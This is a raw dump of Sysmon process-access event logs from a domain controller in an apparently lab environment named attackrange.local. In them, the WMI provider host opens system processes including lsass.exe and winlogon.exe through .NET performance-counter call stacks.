13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005477Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.860{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.782{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.782{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.782{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.782{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A4-5FCF-ED00-000000009101}2772C:\Windows\system32\wbem\WmiApSrv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E200-000000009101}4748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows